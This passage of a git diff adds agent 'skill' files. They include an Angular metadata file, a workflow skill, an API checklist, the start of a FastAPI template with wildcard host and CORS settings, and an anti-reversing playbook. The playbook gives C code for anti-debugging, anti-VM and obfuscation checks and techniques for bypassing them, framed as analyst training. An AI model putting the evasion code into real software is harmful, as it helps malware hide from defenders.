| SSR fetch fails | Use `TransferState` or `withFetch()` |
|
||||
14
web-app/public/skills/angular/metadata.json
Normal file
14
web-app/public/skills/angular/metadata.json
Normal file
@@ -0,0 +1,14 @@
|
||||
{
|
||||
"version": "1.0.0",
|
||||
"organization": "Antigravity Awesome Skills",
|
||||
"date": "February 2026",
|
||||
"abstract": "Comprehensive guide to modern Angular development (v20+) designed for AI agents and LLMs. Covers Signals, Standalone Components, Zoneless applications, SSR/Hydration, reactive patterns, routing, dependency injection, and modern forms. Emphasizes component-driven architecture with practical examples and migration strategies for modernizing existing codebases.",
|
||||
"references": [
|
||||
"https://angular.dev",
|
||||
"https://angular.dev/guide/signals",
|
||||
"https://angular.dev/guide/zoneless",
|
||||
"https://angular.dev/guide/ssr",
|
||||
"https://angular.dev/guide/standalone-components",
|
||||
"https://angular.dev/guide/defer"
|
||||
]
|
||||
}
|
||||
@@ -3,6 +3,7 @@ name: anti-reversing-techniques
|
||||
description: "Understand anti-reversing, obfuscation, and protection techniques encountered during software analysis. Use when analyzing protected binaries, bypassing anti-debugging for authorized analysis, or u..."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
> **AUTHORIZED USE ONLY**: This skill contains dual-use security techniques. Before proceeding with any bypass or analysis:
|
||||
|
||||
@@ -0,0 +1,539 @@
|
||||
# Anti-Reversing Techniques Implementation Playbook
|
||||
|
||||
This file contains detailed patterns, checklists, and code samples referenced by the skill.
|
||||
|
||||
# Anti-Reversing Techniques
|
||||
|
||||
Understanding protection mechanisms encountered during authorized software analysis, security research, and malware analysis. This knowledge helps analysts bypass protections to complete legitimate analysis tasks.
|
||||
|
||||
## Anti-Debugging Techniques
|
||||
|
||||
### Windows Anti-Debugging
|
||||
|
||||
#### API-Based Detection
|
||||
|
||||
```c
|
||||
// IsDebuggerPresent
|
||||
if (IsDebuggerPresent()) {
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// CheckRemoteDebuggerPresent
|
||||
BOOL debugged = FALSE;
|
||||
CheckRemoteDebuggerPresent(GetCurrentProcess(), &debugged);
|
||||
if (debugged) exit(1);
|
||||
|
||||
// NtQueryInformationProcess
|
||||
typedef NTSTATUS (NTAPI *pNtQueryInformationProcess)(
|
||||
HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
|
||||
|
||||
DWORD debugPort = 0;
|
||||
NtQueryInformationProcess(
|
||||
GetCurrentProcess(),
|
||||
ProcessDebugPort, // 7
|
||||
&debugPort,
|
||||
sizeof(debugPort),
|
||||
NULL
|
||||
);
|
||||
if (debugPort != 0) exit(1);
|
||||
|
||||
// Debug flags
|
||||
DWORD debugFlags = 0;
|
||||
NtQueryInformationProcess(
|
||||
GetCurrentProcess(),
|
||||
ProcessDebugFlags, // 0x1F
|
||||
&debugFlags,
|
||||
sizeof(debugFlags),
|
||||
NULL
|
||||
);
|
||||
if (debugFlags == 0) exit(1); // 0 means being debugged
|
||||
```
|
||||
|
||||
**Bypass Approaches:**
|
||||
```python
|
||||
# x64dbg: ScyllaHide plugin
|
||||
# Patches common anti-debug checks
|
||||
|
||||
# Manual patching in debugger:
|
||||
# - Set IsDebuggerPresent return to 0
|
||||
# - Patch PEB.BeingDebugged to 0
|
||||
# - Hook NtQueryInformationProcess
|
||||
|
||||
# IDAPython: Patch checks
|
||||
ida_bytes.patch_byte(check_addr, 0x90) # NOP
|
||||
```
|
||||
|
||||
#### PEB-Based Detection
|
||||
|
||||
```c
|
||||
// Direct PEB access
|
||||
#ifdef _WIN64
|
||||
PPEB peb = (PPEB)__readgsqword(0x60);
|
||||
#else
|
||||
PPEB peb = (PPEB)__readfsdword(0x30);
|
||||
#endif
|
||||
|
||||
// BeingDebugged flag
|
||||
if (peb->BeingDebugged) exit(1);
|
||||
|
||||
// NtGlobalFlag
|
||||
// Debugged: 0x70 (FLG_HEAP_ENABLE_TAIL_CHECK |
|
||||
// FLG_HEAP_ENABLE_FREE_CHECK |
|
||||
// FLG_HEAP_VALIDATE_PARAMETERS)
|
||||
if (peb->NtGlobalFlag & 0x70) exit(1);
|
||||
|
||||
// Heap flags
|
||||
PDWORD heapFlags = (PDWORD)((PBYTE)peb->ProcessHeap + 0x70);
|
||||
if (*heapFlags & 0x50000062) exit(1);
|
||||
```
|
||||
|
||||
**Bypass Approaches:**
|
||||
```assembly
|
||||
; In debugger, modify PEB directly
|
||||
; x64dbg: dump at gs:[60] (x64) or fs:[30] (x86)
|
||||
; Set BeingDebugged (offset 2) to 0
|
||||
; Clear NtGlobalFlag (offset 0xBC for x64)
|
||||
```
|
||||
|
||||
#### Timing-Based Detection
|
||||
|
||||
```c
|
||||
// RDTSC timing
|
||||
uint64_t start = __rdtsc();
|
||||
// ... some code ...
|
||||
uint64_t end = __rdtsc();
|
||||
if ((end - start) > THRESHOLD) exit(1);
|
||||
|
||||
// QueryPerformanceCounter
|
||||
LARGE_INTEGER start, end, freq;
|
||||
QueryPerformanceFrequency(&freq);
|
||||
QueryPerformanceCounter(&start);
|
||||
// ... code ...
|
||||
QueryPerformanceCounter(&end);
|
||||
double elapsed = (double)(end.QuadPart - start.QuadPart) / freq.QuadPart;
|
||||
if (elapsed > 0.1) exit(1); // Too slow = debugger
|
||||
|
||||
// GetTickCount
|
||||
DWORD start = GetTickCount();
|
||||
// ... code ...
|
||||
if (GetTickCount() - start > 1000) exit(1);
|
||||
```
|
||||
|
||||
**Bypass Approaches:**
|
||||
```
|
||||
- Use hardware breakpoints instead of software
|
||||
- Patch timing checks
|
||||
- Use VM with controlled time
|
||||
- Hook timing APIs to return consistent values
|
||||
```
|
||||
|
||||
#### Exception-Based Detection
|
||||
|
||||
```c
|
||||
// SEH-based detection
|
||||
__try {
|
||||
__asm { int 3 } // Software breakpoint
|
||||
}
|
||||
__except(EXCEPTION_EXECUTE_HANDLER) {
|
||||
// Normal execution: exception caught
|
||||
return;
|
||||
}
|
||||
// Debugger ate the exception
|
||||
exit(1);
|
||||
|
||||
// VEH-based detection
|
||||
LONG CALLBACK VectoredHandler(PEXCEPTION_POINTERS ep) {
|
||||
if (ep->ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT) {
|
||||
ep->ContextRecord->Rip++; // Skip INT3
|
||||
return EXCEPTION_CONTINUE_EXECUTION;
|
||||
}
|
||||
return EXCEPTION_CONTINUE_SEARCH;
|
||||
}
|
||||
```
|
||||
|
||||
### Linux Anti-Debugging
|
||||
|
||||
```c
|
||||
// ptrace self-trace
|
||||
if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1) {
|
||||
// Already being traced
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// /proc/self/status
|
||||
FILE *f = fopen("/proc/self/status", "r");
|
||||
char line[256];
|
||||
while (fgets(line, sizeof(line), f)) {
|
||||
if (strncmp(line, "TracerPid:", 10) == 0) {
|
||||
int tracer_pid = atoi(line + 10);
|
||||
if (tracer_pid != 0) exit(1);
|
||||
}
|
||||
}
|
||||
|
||||
// Parent process check
|
||||
if (getppid() != 1 && strcmp(get_process_name(getppid()), "bash") != 0) {
|
||||
// Unusual parent (might be debugger)
|
||||
}
|
||||
```
|
||||
|
||||
**Bypass Approaches:**
|
||||
```bash
|
||||
# LD_PRELOAD to hook ptrace
|
||||
# Compile: gcc -shared -fPIC -o hook.so hook.c
|
||||
long ptrace(int request, ...) {
|
||||
return 0; // Always succeed
|
||||
}
|
||||
|
||||
# Usage
|
||||
LD_PRELOAD=./hook.so ./target
|
||||
```
|
||||
|
||||
## Anti-VM Detection
|
||||
|
||||
### Hardware Fingerprinting
|
||||
|
||||
```c
|
||||
// CPUID-based detection
|
||||
int cpuid_info[4];
|
||||
__cpuid(cpuid_info, 1);
|
||||
// Check hypervisor bit (bit 31 of ECX)
|
||||
if (cpuid_info[2] & (1 << 31)) {
|
||||
// Running in hypervisor
|
||||
}
|
||||
|
||||
// CPUID brand string
|
||||
__cpuid(cpuid_info, 0x40000000);
|
||||
char vendor[13] = {0};
|
||||
memcpy(vendor, &cpuid_info[1], 12);
|
||||
// "VMwareVMware", "Microsoft Hv", "KVMKVMKVM", "VBoxVBoxVBox"
|
||||
|
||||
// MAC address prefix
|
||||
// VMware: 00:0C:29, 00:50:56
|
||||
// VirtualBox: 08:00:27
|
||||
// Hyper-V: 00:15:5D
|
||||
```
|
||||
|
||||
### Registry/File Detection
|
||||
|
||||
```c
|
||||
// Windows registry keys
|
||||
// HKLM\SOFTWARE\VMware, Inc.\VMware Tools
|
||||
// HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions
|
||||
// HKLM\HARDWARE\ACPI\DSDT\VBOX__
|
||||
|
||||
// Files
|
||||
// C:\Windows\System32\drivers\vmmouse.sys
|
||||
// C:\Windows\System32\drivers\vmhgfs.sys
|
||||
// C:\Windows\System32\drivers\VBoxMouse.sys
|
||||
|
||||
// Processes
|
||||
// vmtoolsd.exe, vmwaretray.exe
|
||||
// VBoxService.exe, VBoxTray.exe
|
||||
```
|
||||
|
||||
### Timing-Based VM Detection
|
||||
|
||||
```c
|
||||
// VM exits cause timing anomalies
|
||||
uint64_t start = __rdtsc();
|
||||
__cpuid(cpuid_info, 0); // Causes VM exit
|
||||
uint64_t end = __rdtsc();
|
||||
if ((end - start) > 500) {
|
||||
// Likely in VM (CPUID takes longer)
|
||||
}
|
||||
```
|
||||
|
||||
**Bypass Approaches:**
|
||||
```
|
||||
- Use bare-metal analysis environment
|
||||
- Harden VM (remove guest tools, change MAC)
|
||||
- Patch detection code
|
||||
- Use specialized analysis VMs (FLARE-VM)
|
||||
```
|
||||
|
||||
## Code Obfuscation
|
||||
|
||||
### Control Flow Obfuscation
|
||||
|
||||
#### Control Flow Flattening
|
||||
|
||||
```c
|
||||
// Original
|
||||
if (cond) {
|
||||
func_a();
|
||||
} else {
|
||||
func_b();
|
||||
}
|
||||
func_c();
|
||||
|
||||
// Flattened
|
||||
int state = 0;
|
||||
while (1) {
|
||||
switch (state) {
|
||||
case 0:
|
||||
state = cond ? 1 : 2;
|
||||
break;
|
||||
case 1:
|
||||
func_a();
|
||||
state = 3;
|
||||
break;
|
||||
case 2:
|
||||
func_b();
|
||||
state = 3;
|
||||
break;
|
||||
case 3:
|
||||
func_c();
|
||||
return;
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Analysis Approach:**
|
||||
- Identify state variable
|
||||
- Map state transitions
|
||||
- Reconstruct original flow
|
||||
- Tools: D-810 (IDA), SATURN
|
||||
|
||||
#### Opaque Predicates
|
||||
|
||||
```c
|
||||
// Always true, but complex to analyze
|
||||
int x = rand();
|
||||
if ((x * x) >= 0) { // Always true
|
||||
real_code();
|
||||
} else {
|
||||
junk_code(); // Dead code
|
||||
}
|
||||
|
||||
// Always false
|
||||
if ((x * (x + 1)) % 2 == 1) { // Product of consecutive = even
|
||||
junk_code();
|
||||
}
|
||||
```
|
||||
|
||||
**Analysis Approach:**
|
||||
- Identify constant expressions
|
||||
- Symbolic execution to prove predicates
|
||||
- Pattern matching for known opaque predicates
|
||||
|
||||
### Data Obfuscation
|
||||
|
||||
#### String Encryption
|
||||
|
||||
```c
|
||||
// XOR encryption
|
||||
char decrypt_string(char *enc, int len, char key) {
|
||||
char *dec = malloc(len + 1);
|
||||
for (int i = 0; i < len; i++) {
|
||||
dec[i] = enc[i] ^ key;
|
||||
}
|
||||
dec[len] = 0;
|
||||
return dec;
|
||||
}
|
||||
|
||||
// Stack strings
|
||||
char url[20];
|
||||
url[0] = 'h'; url[1] = 't'; url[2] = 't'; url[3] = 'p';
|
||||
url[4] = ':'; url[5] = '/'; url[6] = '/';
|
||||
// ...
|
||||
```
|
||||
|
||||
**Analysis Approach:**
|
||||
```python
|
||||
# FLOSS for automatic string deobfuscation
|
||||
floss malware.exe
|
||||
|
||||
# IDAPython string decryption
|
||||
def decrypt_xor(ea, length, key):
|
||||
result = ""
|
||||
for i in range(length):
|
||||
byte = ida_bytes.get_byte(ea + i)
|
||||
result += chr(byte ^ key)
|
||||
return result
|
||||
```
|
||||
|
||||
#### API Obfuscation
|
||||
|
||||
```c
|
||||
// Dynamic API resolution
|
||||
typedef HANDLE (WINAPI *pCreateFileW)(LPCWSTR, DWORD, DWORD,
|
||||
LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
|
||||
|
||||
HMODULE kernel32 = LoadLibraryA("kernel32.dll");
|
||||
pCreateFileW myCreateFile = (pCreateFileW)GetProcAddress(
|
||||
kernel32, "CreateFileW");
|
||||
|
||||
// API hashing
|
||||
DWORD hash_api(char *name) {
|
||||
DWORD hash = 0;
|
||||
while (*name) {
|
||||
hash = ((hash >> 13) | (hash << 19)) + *name++;
|
||||
}
|
||||
return hash;
|
||||
}
|
||||
// Resolve by hash comparison instead of string
|
||||
```
|
||||
|
||||
**Analysis Approach:**
|
||||
- Identify hash algorithm
|
||||
- Build hash database of known APIs
|
||||
- Use HashDB plugin for IDA
|
||||
- Dynamic analysis to resolve at runtime
|
||||
|
||||
### Instruction-Level Obfuscation
|
||||
|
||||
#### Dead Code Insertion
|
||||
|
||||
```asm
|
||||
; Original
|
||||
mov eax, 1
|
||||
|
||||
; With dead code
|
||||
push ebx ; Dead
|
||||
mov eax, 1
|
||||
pop ebx ; Dead
|
||||
xor ecx, ecx ; Dead
|
||||
add ecx, ecx ; Dead
|
||||
```
|
||||
|
||||
#### Instruction Substitution
|
||||
|
||||
```asm
|
||||
; Original: xor eax, eax (set to 0)
|
||||
; Substitutions:
|
||||
sub eax, eax
|
||||
mov eax, 0
|
||||
and eax, 0
|
||||
lea eax, [0]
|
||||
|
||||
; Original: mov eax, 1
|
||||
; Substitutions:
|
||||
xor eax, eax
|
||||
inc eax
|
||||
|
||||
push 1
|
||||
pop eax
|
||||
```
|
||||
|
||||
## Packing and Encryption
|
||||
|
||||
### Common Packers
|
||||
|
||||
```
|
||||
UPX - Open source, easy to unpack
|
||||
Themida - Commercial, VM-based protection
|
||||
VMProtect - Commercial, code virtualization
|
||||
ASPack - Compression packer
|
||||
PECompact - Compression packer
|
||||
Enigma - Commercial protector
|
||||
```
|
||||
|
||||
### Unpacking Methodology
|
||||
|
||||
```
|
||||
1. Identify packer (DIE, Exeinfo PE, PEiD)
|
||||
|
||||
2. Static unpacking (if known packer):
|
||||
- UPX: upx -d packed.exe
|
||||
- Use existing unpackers
|
||||
|
||||
3. Dynamic unpacking:
|
||||
a. Find Original Entry Point (OEP)
|
||||
b. Set breakpoint on OEP
|
||||
c. Dump memory when OEP reached
|
||||
d. Fix import table (Scylla, ImpREC)
|
||||
|
||||
4. OEP finding techniques:
|
||||
- Hardware breakpoint on stack (ESP trick)
|
||||
- Break on common API calls (GetCommandLineA)
|
||||
- Trace and look for typical entry patterns
|
||||
```
|
||||
|
||||
### Manual Unpacking Example
|
||||
|
||||
```
|
||||
1. Load packed binary in x64dbg
|
||||
2. Note entry point (packer stub)
|
||||
3. Use ESP trick:
|
||||
- Run to entry
|
||||
- Set hardware breakpoint on [ESP]
|
||||
- Run until breakpoint hits (after PUSHAD/POPAD)
|
||||
4. Look for JMP to OEP
|
||||
5. At OEP, use Scylla to:
|
||||
- Dump process
|
||||
- Find imports (IAT autosearch)
|
||||
- Fix dump
|
||||
```
|
||||
|
||||
## Virtualization-Based Protection
|
||||
|
||||
### Code Virtualization
|
||||
|
||||
```
|
||||
Original x86 code is converted to custom bytecode
|
||||
interpreted by embedded VM at runtime.
|
||||
|
||||
Original: VM Protected:
|
||||
mov eax, 1 push vm_context
|
||||
add eax, 2 call vm_entry
|
||||
; VM interprets bytecode
|
||||
; equivalent to original
|
||||
```
|
||||
|
||||
### Analysis Approaches
|
||||
|
||||
```
|
||||
1. Identify VM components:
|
||||
- VM entry (dispatcher)
|
||||
- Handler table
|
||||
- Bytecode location
|
||||
- Virtual registers/stack
|
||||
|
||||
2. Trace execution:
|
||||
- Log handler calls
|
||||
- Map bytecode to operations
|
||||
- Understand instruction set
|
||||
|
||||
3. Lifting/devirtualization:
|
||||
- Map VM instructions back to native
|
||||
- Tools: VMAttack, SATURN, NoVmp
|
||||
|
||||
4. Symbolic execution:
|
||||
- Analyze VM semantically
|
||||
- angr, Triton
|
||||
```
|
||||
|
||||
## Bypass Strategies Summary
|
||||
|
||||
### General Principles
|
||||
|
||||
1. **Understand the protection**: Identify what technique is used
|
||||
2. **Find the check**: Locate protection code in binary
|
||||
3. **Patch or hook**: Modify check to always pass
|
||||
4. **Use appropriate tools**: ScyllaHide, x64dbg plugins
|
||||
5. **Document findings**: Keep notes on bypassed protections
|
||||
|
||||
### Tool Recommendations
|
||||
|
||||
```
|
||||
Anti-debug bypass: ScyllaHide, TitanHide
|
||||
Unpacking: x64dbg + Scylla, OllyDumpEx
|
||||
Deobfuscation: D-810, SATURN, miasm
|
||||
VM analysis: VMAttack, NoVmp, manual tracing
|
||||
String decryption: FLOSS, custom scripts
|
||||
Symbolic execution: angr, Triton
|
||||
```
|
||||
|
||||
### Ethical Considerations
|
||||
|
||||
This knowledge should only be used for:
|
||||
- Authorized security research
|
||||
- Malware analysis (defensive)
|
||||
- CTF competitions
|
||||
- Understanding protections for legitimate purposes
|
||||
- Educational purposes
|
||||
|
||||
Never use to bypass protections for:
|
||||
- Software piracy
|
||||
- Unauthorized access
|
||||
- Malicious purposes
|
||||
81
web-app/public/skills/antigravity-workflows/SKILL.md
Normal file
81
web-app/public/skills/antigravity-workflows/SKILL.md
Normal file
@@ -0,0 +1,81 @@
|
||||
---
|
||||
name: antigravity-workflows
|
||||
description: "Orchestrate multiple Antigravity skills through guided workflows for SaaS MVP delivery, security audits, AI agent builds, and browser QA."
|
||||
risk: none
|
||||
source: self
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Antigravity Workflows
|
||||
|
||||
Use this skill to turn a complex objective into a guided sequence of skill invocations.
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
Use this skill when:
|
||||
- The user wants to combine several skills without manually selecting each one.
|
||||
- The goal is multi-phase (for example: plan, build, test, ship).
|
||||
- The user asks for best-practice execution for common scenarios like:
|
||||
- Shipping a SaaS MVP
|
||||
- Running a web security audit
|
||||
- Building an AI agent system
|
||||
- Implementing browser automation and E2E QA
|
||||
|
||||
## Workflow Source of Truth
|
||||
|
||||
Read workflows in this order:
|
||||
1. `docs/WORKFLOWS.md` for human-readable playbooks.
|
||||
2. `data/workflows.json` for machine-readable workflow metadata.
|
||||
|
||||
## How to Run This Skill
|
||||
|
||||
1. Identify the user's concrete outcome.
|
||||
2. Propose the 1-2 best matching workflows.
|
||||
3. Ask the user to choose one.
|
||||
4. Execute step-by-step:
|
||||
- Announce current step and expected artifact.
|
||||
- Invoke recommended skills for that step.
|
||||
- Verify completion criteria before moving to next step.
|
||||
5. At the end, provide:
|
||||
- Completed artifacts
|
||||
- Validation evidence
|
||||
- Remaining risks and next actions
|
||||
|
||||
## Default Workflow Routing
|
||||
|
||||
- Product delivery request -> `ship-saas-mvp`
|
||||
- Security review request -> `security-audit-web-app`
|
||||
- Agent/LLM product request -> `build-ai-agent-system`
|
||||
- E2E/browser testing request -> `qa-browser-automation`
|
||||
|
||||
## Copy-Paste Prompts
|
||||
|
||||
```text
|
||||
Use @antigravity-workflows to run the "Ship a SaaS MVP" workflow for my project idea.
|
||||
```
|
||||
|
||||
```text
|
||||
Use @antigravity-workflows and execute a full "Security Audit for a Web App" workflow.
|
||||
```
|
||||
|
||||
```text
|
||||
Use @antigravity-workflows to guide me through "Build an AI Agent System" with checkpoints.
|
||||
```
|
||||
|
||||
```text
|
||||
Use @antigravity-workflows to execute the "QA and Browser Automation" workflow and stabilize flaky tests.
|
||||
```
|
||||
|
||||
## Limitations
|
||||
|
||||
- This skill orchestrates; it does not replace specialized skills.
|
||||
- It depends on the local availability of referenced skills.
|
||||
- It does not guarantee success without environment access, credentials, or required infrastructure.
|
||||
- For stack-specific browser automation in Go, `go-playwright` may require the corresponding skill to be present in your local skills repository.
|
||||
|
||||
## Related Skills
|
||||
|
||||
- `concise-planning`
|
||||
- `brainstorming`
|
||||
- `workflow-automation`
|
||||
- `verification-before-completion`
|
||||
@@ -0,0 +1,36 @@
|
||||
# Antigravity Workflows Implementation Playbook
|
||||
|
||||
This document explains how an agent should execute workflow-based orchestration.
|
||||
|
||||
## Execution Contract
|
||||
|
||||
For every workflow:
|
||||
|
||||
1. Confirm objective and scope.
|
||||
2. Select the best-matching workflow.
|
||||
3. Execute workflow steps in order.
|
||||
4. Produce one concrete artifact per step.
|
||||
5. Validate before continuing.
|
||||
|
||||
## Step Artifact Examples
|
||||
|
||||
- Plan step -> scope document or milestone checklist.
|
||||
- Build step -> code changes and implementation notes.
|
||||
- Test step -> test results and failure triage.
|
||||
- Release step -> rollout checklist and risk log.
|
||||
|
||||
## Safety Guardrails
|
||||
|
||||
- Never run destructive actions without explicit user approval.
|
||||
- If a required skill is missing, state the gap and fallback to closest available skill.
|
||||
- When security testing is involved, ensure authorization is explicit.
|
||||
|
||||
## Suggested Completion Format
|
||||
|
||||
At workflow completion, return:
|
||||
|
||||
1. Completed steps
|
||||
2. Artifacts produced
|
||||
3. Validation evidence
|
||||
4. Open risks
|
||||
5. Suggested next action
|
||||
@@ -3,6 +3,7 @@ name: api-design-principles
|
||||
description: "Master REST and GraphQL API design principles to build intuitive, scalable, and maintainable APIs that delight developers. Use when designing new APIs, reviewing API specifications, or establishing..."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# API Design Principles
|
||||
|
||||
@@ -0,0 +1,155 @@
|
||||
# API Design Checklist
|
||||
|
||||
## Pre-Implementation Review
|
||||
|
||||
### Resource Design
|
||||
|
||||
- [ ] Resources are nouns, not verbs
|
||||
- [ ] Plural names for collections
|
||||
- [ ] Consistent naming across all endpoints
|
||||
- [ ] Clear resource hierarchy (avoid deep nesting >2 levels)
|
||||
- [ ] All CRUD operations properly mapped to HTTP methods
|
||||
|
||||
### HTTP Methods
|
||||
|
||||
- [ ] GET for retrieval (safe, idempotent)
|
||||
- [ ] POST for creation
|
||||
- [ ] PUT for full replacement (idempotent)
|
||||
- [ ] PATCH for partial updates
|
||||
- [ ] DELETE for removal (idempotent)
|
||||
|
||||
### Status Codes
|
||||
|
||||
- [ ] 200 OK for successful GET/PATCH/PUT
|
||||
- [ ] 201 Created for POST
|
||||
- [ ] 204 No Content for DELETE
|
||||
- [ ] 400 Bad Request for malformed requests
|
||||
- [ ] 401 Unauthorized for missing auth
|
||||
- [ ] 403 Forbidden for insufficient permissions
|
||||
- [ ] 404 Not Found for missing resources
|
||||
- [ ] 422 Unprocessable Entity for validation errors
|
||||
- [ ] 429 Too Many Requests for rate limiting
|
||||
- [ ] 500 Internal Server Error for server issues
|
||||
|
||||
### Pagination
|
||||
|
||||
- [ ] All collection endpoints paginated
|
||||
- [ ] Default page size defined (e.g., 20)
|
||||
- [ ] Maximum page size enforced (e.g., 100)
|
||||
- [ ] Pagination metadata included (total, pages, etc.)
|
||||
- [ ] Cursor-based or offset-based pattern chosen
|
||||
|
||||
### Filtering & Sorting
|
||||
|
||||
- [ ] Query parameters for filtering
|
||||
- [ ] Sort parameter supported
|
||||
- [ ] Search parameter for full-text search
|
||||
- [ ] Field selection supported (sparse fieldsets)
|
||||
|
||||
### Versioning
|
||||
|
||||
- [ ] Versioning strategy defined (URL/header/query)
|
||||
- [ ] Version included in all endpoints
|
||||
- [ ] Deprecation policy documented
|
||||
|
||||
### Error Handling
|
||||
|
||||
- [ ] Consistent error response format
|
||||
- [ ] Detailed error messages
|
||||
- [ ] Field-level validation errors
|
||||
- [ ] Error codes for client handling
|
||||
- [ ] Timestamps in error responses
|
||||
|
||||
### Authentication & Authorization
|
||||
|
||||
- [ ] Authentication method defined (Bearer token, API key)
|
||||
- [ ] Authorization checks on all endpoints
|
||||
- [ ] 401 vs 403 used correctly
|
||||
- [ ] Token expiration handled
|
||||
|
||||
### Rate Limiting
|
||||
|
||||
- [ ] Rate limits defined per endpoint/user
|
||||
- [ ] Rate limit headers included
|
||||
- [ ] 429 status code for exceeded limits
|
||||
- [ ] Retry-After header provided
|
||||
|
||||
### Documentation
|
||||
|
||||
- [ ] OpenAPI/Swagger spec generated
|
||||
- [ ] All endpoints documented
|
||||
- [ ] Request/response examples provided
|
||||
- [ ] Error responses documented
|
||||
- [ ] Authentication flow documented
|
||||
|
||||
### Testing
|
||||
|
||||
- [ ] Unit tests for business logic
|
||||
- [ ] Integration tests for endpoints
|
||||
- [ ] Error scenarios tested
|
||||
- [ ] Edge cases covered
|
||||
- [ ] Performance tests for heavy endpoints
|
||||
|
||||
### Security
|
||||
|
||||
- [ ] Input validation on all fields
|
||||
- [ ] SQL injection prevention
|
||||
- [ ] XSS prevention
|
||||
- [ ] CORS configured correctly
|
||||
- [ ] HTTPS enforced
|
||||
- [ ] Sensitive data not in URLs
|
||||
- [ ] No secrets in responses
|
||||
|
||||
### Performance
|
||||
|
||||
- [ ] Database queries optimized
|
||||
- [ ] N+1 queries prevented
|
||||
- [ ] Caching strategy defined
|
||||
- [ ] Cache headers set appropriately
|
||||
- [ ] Large responses paginated
|
||||
|
||||
### Monitoring
|
||||
|
||||
- [ ] Logging implemented
|
||||
- [ ] Error tracking configured
|
||||
- [ ] Performance metrics collected
|
||||
- [ ] Health check endpoint available
|
||||
- [ ] Alerts configured for errors
|
||||
|
||||
## GraphQL-Specific Checks
|
||||
|
||||
### Schema Design
|
||||
|
||||
- [ ] Schema-first approach used
|
||||
- [ ] Types properly defined
|
||||
- [ ] Non-null vs nullable decided
|
||||
- [ ] Interfaces/unions used appropriately
|
||||
- [ ] Custom scalars defined
|
||||
|
||||
### Queries
|
||||
|
||||
- [ ] Query depth limiting
|
||||
- [ ] Query complexity analysis
|
||||
- [ ] DataLoaders prevent N+1
|
||||
- [ ] Pagination pattern chosen (Relay/offset)
|
||||
|
||||
### Mutations
|
||||
|
||||
- [ ] Input types defined
|
||||
- [ ] Payload types with errors
|
||||
- [ ] Optimistic response support
|
||||
- [ ] Idempotency considered
|
||||
|
||||
### Performance
|
||||
|
||||
- [ ] DataLoader for all relationships
|
||||
- [ ] Query batching enabled
|
||||
- [ ] Persisted queries considered
|
||||
- [ ] Response caching implemented
|
||||
|
||||
### Documentation
|
||||
|
||||
- [ ] All fields documented
|
||||
- [ ] Deprecations marked
|
||||
- [ ] Examples provided
|
||||
- [ ] Schema introspection enabled
|
||||
@@ -0,0 +1,182 @@
|
||||
"""
|
||||
Production-ready REST API template using FastAPI.
|
||||
Includes pagination, filtering, error handling, and best practices.
|
||||
"""
|
||||
|
||||
from fastapi import FastAPI, HTTPException, Query, Path, Depends, status
|
||||
from fastapi.middleware.cors import CORSMiddleware
|
||||
from fastapi.middleware.trustedhost import TrustedHostMiddleware
|
||||
from fastapi.responses import JSONResponse
|
||||
from pydantic import BaseModel, Field, EmailStr, ConfigDict
|
||||
from typing import Optional, List, Any
|
||||
from datetime import datetime
|
||||
from enum import Enum
|
||||
|
||||
app = FastAPI(
|
||||
title="API Template",
|
||||
version="1.0.0",
|
||||
docs_url="/api/docs"
|
||||
)
|
||||
|
||||
# Security Middleware
|
||||
# Trusted Host: Prevents HTTP Host Header attacks
|
||||
app.add_middleware(
|
||||
TrustedHostMiddleware,
|
||||
allowed_hosts=["*"] # TODO: Configure this in production, e.g. ["api.example.com"]
|
||||
)
|
||||
|
||||
# CORS: Configures Cross-Origin Resource Sharing
|
||||
app.add_middleware(
|
||||
CORSMiddleware,
|
||||
allow_origins=["*"], # TODO: Update this with specific origins in production
|
||||
allow_credentials=False, # TODO: Set to True if you need cookies/auth headers, but restrict origins
|
||||
allow_methods=["*"],
|
||||
allow_headers=["*"],
|
||||
)
|
||||
|
||||
# Models
|
||||
class UserStatus(str, Enum):
|
||||
ACTIVE = "active"
|
||||
INACTIVE = "inactive"
|
||||
SUSPENDED = "suspended"
|
||||
|
||||
class UserBase(BaseModel):
|
||||
email: EmailStr
|
||||
name: str = Field(..., min_length=1, max_length=100)
|
||||
status: UserStatus = UserStatus.ACTIVE
|
||||
|
||||
class UserCreate(UserBase):
|
||||
password: str = Field(..., min_length=8)
|
||||
|
||||
class UserUpdate(BaseModel):
|
||||
email: Optional[EmailStr] = None
|
||||
name: Optional[str] = Field(None, min_length=1, max_length=100)
|
||||
status: Optional[UserStatus] = None
|
||||
|
||||
class User(UserBase):
|
||||
id: str
|
||||
created_at: datetime
|
||||
updated_at: datetime
|
||||
|
||||
model_config = ConfigDict(from_attributes=True)
|
||||
|
||||
# Pagination
|
||||
class PaginationParams(BaseModel):
|
||||
page: int = Field(1, ge=1)
|
||||
page_size: int = Field(20, ge=1, le=100)
|
||||
|
||||
class PaginatedResponse(BaseModel):
|
||||
items: List[Any]
|
||||
total: int
|
||||
page: int
|
||||
page_size: int
|
||||
pages: int
|
||||
|
||||
# Error handling
|
||||
class ErrorDetail(BaseModel):
|
||||
field: Optional[str] = None
|
||||
message: str
|
||||
code: str
|
||||
|
||||
class ErrorResponse(BaseModel):
|
||||
error: str
|
||||
message: str
|
||||
details: Optional[List[ErrorDetail]] = None
|
||||
|
||||
@app.exception_handler(HTTPException)
|
||||
async def http_exception_handler(request, exc):
|
||||
return JSONResponse(
|
||||
status_code=exc.status_code,
|
||||
content=ErrorResponse(
|
||||
error=exc.__class__.__name__,
|
||||
message=exc.detail if isinstance(exc.detail, str) else exc.detail.get("message", "Error"),
|
||||
details=exc.detail.get("details") if isinstance(exc.detail, dict) else None
|
||||
).model_dump()
|
||||
)
|
||||
|
||||
# Endpoints
|
||||
@app.get("/api/users", response_model=PaginatedResponse, tags=["Users"])
|
||||
async def list_users(
|
||||
